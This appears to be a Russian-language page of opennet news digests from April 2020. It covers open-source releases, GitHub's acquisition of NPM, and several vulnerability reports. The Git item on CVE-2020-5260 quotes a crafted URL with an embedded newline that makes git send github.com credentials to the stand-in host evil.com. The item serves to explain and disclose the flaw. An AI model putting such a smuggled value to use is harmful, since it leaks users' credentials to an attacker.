Разработчики проекта Fedora объявили о переносе релиза Fedora 32 на одну неделю в связи с невыполнением критериев качества. Релиз Fedora 32 планируют выпустить 28 апреля, а не 21 апреля, как было намечено изначально. В финальных тестовых сборках остаются неисправленными 3 проблемы, которые отнесены к блокирующим выпуск. Из блокирующих релиз проблем можно отметить: проблемы с распознаванием LVM-разделов в режиме восстановления после сбоя, зависание при попытке загрузки на системах с GPU NVIDIA Turing в режиме «Secure Boot» и отсутствие финальной версии пакета f32-backgrounds в стабильном репозитории. Источник: http://www.opennet.ru/opennews/art.shtml?num=52751 Читать далее Релиз Fedora 32 отложен на неделю

Представлен выпуск системы обмена сообщениями Mattermost 5.22, ориентированной на обеспечение коммуникации разработчиков и сотрудников предприятий. Код серверной части проекта написан на языке Go и распространяется под лицензией MIT. Web-интерфейс и мобильные приложения написаны на JavaScript с использованием React, десктоп-клиент для Linux, Windows и macOS построен на платформе Electron. В качестве СУБД могут применяться MySQL и Postgres. Mattermost позиционируется как открытая альтернатива системе организации коммуникаций Slack и позволяет получать и отправлять сообщения, файлы и изображения, отслеживать историю переговоров и получать уведомления на смартфоне или ПК. Поддерживаются подготовленные для Slack модули интеграции, а также предоставлена большая коллекция собственных модулей для интеграции с … Читать далее Выпуск системы обмена сообщениями Mattermost 5.22

Компания Valve опубликовала выпуск проекта Proton 5.0-6, который основан на наработках проекта Wine и нацелен на обеспечение запуска в Linux игровых приложений, созданных для Windows и представленных в каталоге Steam. Наработки проекта распространяются под лицензией BSD. Proton позволяет напрямую запускать в Linux-клиенте Steam игровые приложения, поставляемые только для Windows. Пакет включает в себя реализацию DirectX 9/10/11 (на базе пакета DXVK) и DirectX 12 (на базе vkd3d), работающие через трансляцию вызовов DirectX в API Vulkan, предоставляет улучшенную поддержку игровых контроллеров и возможность использования полноэкранного режима независимо от поддерживаемых в играх разрешений экрана. Для увеличения производительности многопоточных игр поддерживаются механизмы «esync» (Eventfd … Читать далее Компания Valve выпустила Proton 5.0-6, пакет для запуска Windows-игр в Linux

В драйвере vhost-net, обеспечивающем работу virtio net на стороне хост-окружения, выявлена уязвимость (CVE-2020-10942), позволяющая локальному пользователю инициировать переполнение стека ядра через отправку устройству /dev/vhost-net определённым образом оформленного ioctl(VHOST_NET_SET_BACKEND). Проблема вызвана отсутствием должной проверки содержимого поля sk_family в коде функции get_raw_socket(). По предварительным данным уязвимость можно использовать для совершения локальной DoS-атаки через вызов краха ядра (сведений об использовании вызываемого уязвимостью переполнения стека для организации выполнения кода нет). Уязвимость устранена в обновлении ядра Linux 5.5.8. Для дистрибутивов проследить за выпуском обновлений пакетов можно на страницах Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch. Источник: http://www.opennet.ru/opennews/art.shtml?num=52747 Читать далее Уязвимость в драйвере vhost-net из состава ядра Linux

Компания GitHub Inc, принадлежащая Microsoft и функционирующая в качестве независимого бизнес-подразделения, объявила об успешном завершении сделки по покупке бизнеса компании NPM Inc, контролирующей разработку пакетного менеджера NPM и занимающейся поддержанием репозитория NPM. Репозиторий NPM обслуживает более 1.3 млн пакетов, которыми пользуются около 12 млн разработчиков. В месяц фиксируется около 75 миллиардов загрузок. Сумма сделки не называется. Ahmad Nassri, технический директор NPM Inc, сообщил о решении уйти из команды NPM, отдохнуть, проанализировать свой опыт и воспользоваться новыми возможностями (в профиле Ахмеда появились данные, что он занял должность техдиректора в компании Fractional). Айзек Шлютер (Isaac Z. Schlueter), создатель NPM, продолжит работать над … Читать далее GitHub успешно завершил сделку по покупке NPM

Опубликовано обновление браузера Chrome 81.0.4044.113 в котором устранена уязвимость, имеющая статус критической проблемы, позволяющей обойти все уровни защиты браузера и выполнить код в системе, за пределами sandbox-окружения. Детали об уязвимости (CVE-2020-6457) пока не раскрываются, известно только, что она вызвана обращением к уже освобождённому блоку памяти в компоненте для распознавания речи (к слову, прошлая критическая уязвимость в Chrome также затрагивала данный компонент). Источник: http://www.opennet.ru/opennews/art.shtml?num=52745 Читать далее Обновление Chrome 81.0.4044.113 с устранением критической уязвимости

Швейцарская компания Proton Technologies AG объявила в своём блоге об открытии исходного кода приложения ProtonMail Bridge для всех поддерживаемых платформ (Linux, MacOS, Windows). Код распространяется под лицензией GPLv3. Дополнительно опубликована модель безопасности приложения. Заинтересованным экспертам предложено присоединиться к программе bug bounty. ProtonMail Bridge предназначен для работы с сервисом защищённой электронной почты ProtonMail с использованием предпочитаемого десктопного почтового клиента, сохраняя при этом высокий уровень защиты передаваемых по сети данных. Ранее приложение было доступно только на платных тарифах. Таким образом компания продолжает процесс постепенного открытия исходных кодов, начатый в 2015г. Ранее в разряд открытых уже были переведены: Web-фронтенд Почтовый клиент для iOS … Читать далее Открыт исходный код ProtonMail Bridge

Состоялся релиз пакетного менеджера GNU Guix 1.1 и построенного на его основе дистрибутива GNU/Linux. Для загрузки сформированы образы для установки на USB Flash (241 Мб)и использования в системах виртуализации (479 Мб). Поддерживается работа на архитектурах i686, x86_64, armv7 и aarch64. Дистрибутив допускает установку как в качестве обособленной ОС в системах виртуализации, в контейнерах и на обычном оборудовании, так и запуск в уже установленных дистрибутивах GNU/Linux, выступая в роли платформы для развёртывания приложений. Пользователю предоставляются такие функции, как учёт зависимостей, повторяемые сборки, работа без root, откат на прошлые версии в случае проблем, управление конфигурацией, клонирование окружений (создание точной копии программного окружения … Читать далее Доступен пакетный менеджер GNU Guix 1.1 и дистрибутив на его основе

Компания Oracle опубликовала корректирующий релиз системы виртуализации VirtualBox 6.1.6, в котором отмечено 9 исправлений. Одновременно также выпущены корректирующие релизы VirtualBox 6.0.20 и 5.2.40. В обновлениях устранено 19 уязвимостей, из которых 7 проблем имеют критический уровень опасности (CVSS больше 8). В том числе устранены уязвимости, используемые в атаках, продемонстрированных на соревновании Pwn2Own 2020 и позволяющие через манипуляции на стороне гостевой системы получить доступ к хост-системе и выполнить код с правами гипервизора. Не связанные с безопасностью изменения в выпуске 6.1.6: В компоненты для хост-окружения и дополнения для гостевых систем добавлена поддержка ядра Linux 5.6; Улучшена поддержка 2D- и 3D-ускорения, а также рендеринга; … Читать далее Выпуск VirtualBox 6.1.6

Компании MyCrypto и PhishFort выявили в каталоге Chrome Web Store 49 вредоносных дополнений, отправляющих ключи и пароли от криптокошельков на серверы злоумышленников. Дополнения распространялись с использованием методов фишинговой рекламы и преподносились как реализации различных кошельков криптовалют. Дополнения были основаны на коде официальных кошельков, но включали вредоносные изменения, выполняющие отправку закрытых ключей, кодов восстановления доступа и файлов с ключами. Для некоторых дополнений при помощи фиктивных пользователей искусственно поддерживался положительный рейтинг и публиковались положительные отзывы. Компания Google удалила указанные дополнения из каталога Chrome Web Store в течение 24 часов после уведомления. Публикация первых вредоносных дополнений началась в феврале, но пик пришёлся на … Читать далее В Chrome Web Store выявлено 49 дополнений, перехватывающих ключи от криптокошельков

Разработчики пакета совместной работы и электронной почты Zimbra, позиционируемого как альтернатива MS Exchange, изменили политику в области публикации открытого кода. Начиная с выпуска Zimbra 9 проект перестанет публиковать бинарные сборки Zimbra Open Source Edition и ограничится только выпуском коммерческой версии Zimbra Network Edition. Более того, разработчики не планируют выпускать исходные тексты Zimbra 9 для сообщества и будут развивать Zimbra 9 в форме проприетарного продукта. Старая ветка Zimbra 8.8.15 останется открытой и будет сопровождаться до 31 декабря 2024 года. Источник: http://www.opennet.ru/opennews/art.shtml?num=52739 Читать далее Zimbra сворачивает публикацию открытых выпусков для новой ветки

Для реализации в Fedora 33 намечено изменение, переводящее дистрибутив на использование по умолчанию systemd-resolved для резолвинга DNS-запросов. Glibc будет переведён на nss-resolve от проекта systemd вместо встроенного NSS-модуля nss-dns. Systemd-resolved выполняет такие функции как поддержание настроек в файле resolv.conf на основании данных DHCP и статической конфигурации DNS для сетевых интерфейсов, поддерживает DNSSEC и LLMNR (Link Local Multicast Name Resolution). Из достоинств перехода на systemd-resolved называется поддержка DNS over TLS, возможность включения локального кэширования DNS-запросов и поддержка привязки разных обработчиков к разным сетевым интерфейсам (в зависимости от сетевого интерфейса выбирается DNS-сервер для обращения, например для VPN-интерфейсов DNS-запросы будут отправляться через VPN). … Читать далее В Fedora 33 планируют перейти на использование systemd-resolved

Сформирован выпуск основной ветки nginx 1.17.10, в рамках которой продолжается развитие новых возможностей (в параллельно поддерживаемой стабильной ветке 1.16 вносятся только изменения, связанные с устранением серьёзных ошибок и уязвимостей). В новой версии реализована новая директива «auth_delay«, позволяющая добавить задержку неавторизованных запросов с кодом ответа 401 для сокращения интенсивности подбора паролей и защиты от атак, манипулирующих измерением времени выполнения операций (timing attack) при обращении к системам, доступ к которым ограничен паролем, результатом подзапроса или JWT (JSON Web Token). Источник: http://www.opennet.ru/opennews/art.shtml?num=52736 Читать далее Выпуск nginx 1.17.10

В кодовую базу «ZFS on Linux«, развиваемую под эгидой проекта OpenZFS в качестве эталонной реализации ZFS, приняты изменения, добавляющие поддержку операционной системы FreeBSD. Добавленный в «ZFS on Linux» код протестирован в ветках FreeBSD 11 и 12. Таким образом, разработчикам FreeBSD теперь не нужно поддерживать собственное синхронизированное ответвление «ZFS on Linux» и разработка всех связанных с FreeBSD изменений будет осуществляться в основном проекте. Кроме того, работоспособность во FreeBSD основной ветки «ZFS on Linux» в процессе разработки будет тестироваться в системе непрерывной интеграции. Напомним, что в декабре 2018 года разработчики FreeBSD выступили с инициативой перехода на реализацию ZFS от проекта «ZFS on … Читать далее В ZFS on Linux добавлена поддержка FreeBSD

Опубликовано обновление операционной системы Solaris 11.4 SRU 20 (Support Repository Update), в котором предложена серия очередных исправлений и улучшений для ветки Solaris 11.4. Для установки предложенных в обновлении исправлений достаточно выполнить команду ‘pkg update’. В новом выпуске пакет ICU (International Components for Unicode) обновлён до версии 65.1, исправлено чуть менее ста ошибок, включая обновления версий следующих компонентов для устранения проблем с безопасностью: tcpdump 4.9.3, libpcap 1.9.1, sudo 1.8.30, wireshark 2.6.15, Apache Tomcat 8.5.51, mod_auth_mellon 0.16.0, Firefox 68.6.0esr, PHP 7.3.15, Thunderbird 68.6.0, openjpeg. Источник: http://www.opennet.ru/opennews/art.shtml?num=52735 Читать далее Обновление Solaris 11.4 SRU 20

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 и 2.17.4, в которых устранена уязвимость (CVE-2020-5260) в обработчике «credential.helper«, приводящая к отправке учётных данных не на тот хост при обращении git-клиента к репозиторию по специально оформленному URL, содержащему символ новой строки. Уязвимость можно использовать для организации отправки на сервер, подконтрольный атакующему, учётных данных от другого хоста. При указании URL вида «https://evil.com?%0ahost=github.com/» обработчик учётных данных при подключении к хосту evil.com передаст параметры аутентификации, заданные для github.com. Проблема проявляется при выполнении таких операций, как «git clone», в том числе при обработке URL для … Читать далее Уязвимость в Git, приводящая к утечке учётных данных

GitHub объявил о снятии ограничений на приватные репозитории и переводе данной функциональности в разряд полностью бесплатных. Любой пользователь GitHub получил возможность бесплатного создания приватных репозиториев с неограниченным числом участников. Ранее в GitHub позволял бесплатно подключать не более трёх разработчиков к приватным репозиториям, предназначенным для развития непубличных или не подлежащие разглашению проектов, доступ к которым предоставляется только узкому кругу разработчиков. Число создаваемых приватных репозиториев не ограничено. Снятие ограничения на число пользователей позволяет командам любых проектов использовать GitHub как единое место для решения всех основных задач разработки, включая непрерывную интеграцию, управление проектом, рецензирование кода, формирование пакетов и т.п. В конкурирующей платформе BitBucket.org … Читать далее GitHub сделал бесплатными средства для работы с приватными репозиториями

Комитет FESCo (Fedora Engineering Steering Committee), отвечающий за техническую часть разработки дистрибутива Fedora, утвердил предложение по реализации проекта ELN (Enterprise Linux Next), нацеленного на предоставление окружения, основанного на репозитории Fedora Rawhide, которое может применяться для тестирования функциональности будущих выпусков дистрибутива RHEL (Red Hat Enterprise Linux). Для ELN будет подготовлен новый buildroot и процесс сборки для эмуляции формирования Red Hat Enterprise Linux на базе пакетов с исходными текстами из репозитория Fedora. Проект намечен к реализации в рамках цикла разработки Fedora 33. ELN предоставит инфраструктуру, позволяющую собирать Fedora-пакеты с использованием методов, применяемых в CentOS и RHEL, и даст возможность сопровождающим пакеты Fedora … Читать далее Проект по эмуляции сборки Red Hat Enterprise Linux на базе Fedora

Компания Cisco опубликовала релиз Snort 2.9.16.0, свободной системы обнаружения и предотвращения атак, комбинирующей в себе методы сопоставления по сигнатурам, средства для инспекции протоколов и механизмы для выявления аномалий. В новом выпуске реализован режим раннего инспектирования HTTP-данных, работающий на этапе до срабатывания обычных обработчиков. Для активации режима следует использовать опцию fast_blocking в блоке настроек инспектирования http. Кроме того в новом выпуске обеспечена нормализация в UTF-8 случайно закодированных нулевых значений в ответах HTTP-сервера, а также добавлена поддержка Glibc 2.30 и 64-разрядных Windows 10. Источник: http://www.opennet.ru/opennews/art.shtml?num=52729 Читать далее Релиз системы обнаружения атак Snort 2.9.16.0

Опубликован отчёт о развитии проекта FreeBSD с января по март 2020 года. Из изменений можно отметить: Общие и системные вопросы Из дерева исходных текстов FreeBSD-CURRENT удалён набор компиляторов GCC, а также неиспользуемые утилиты gperf, gcov и gtc (компилятор devicetree). Все платформы, не поддерживающие Clang, переведены на использование внешнего сборочного инструментария, устанавливаемого из портов. В базовой системе поставлялся устаревший выпуск GCC 4.2.1, а интеграция более новых версий была невозможна из-за перехода 4.2.2 на лицензию GPLv3, которая была признана неприемлемой для базовых компонентов FreeBSD. Актуальные выпуски GCC, включая GCC 9, как и раньше, можно установить из пакетов и портов. В инфраструктуре эмуляции … Читать далее Отчёт о развитии FreeBSD за первый квартал 2020 года

Исследователи из компании Microsoft и Университета Центрального Китая разработали новый высокопроизводительный метод отслеживания нескольких объектов на видео с использованием технологий машинного обучения — FairMOT (Fair Multi-Object Tracking). Код с реализацией метода на базе Pytorch и натренированные модели опубликованы на GitHub. Большинство существующих методов отслеживания объектов используют два этапа, каждый из которых реализуется отдельной нейронной сетью. На первом этапе выполняется модель определения местоположения интересующих объектов, а на втором этапе используется модель поиска ассоциаций, применяемая для повторной идентификации объектов и привязки к ним якорей. В FairMOT применяется одноэтапная реализация на базе деформируемой свёрточной нейронной сети (DCNv2, Deformable Convolutional Network), которая позволяет добиться … Читать далее FairMOT, система для быстрого отслеживания нескольких объектов на видео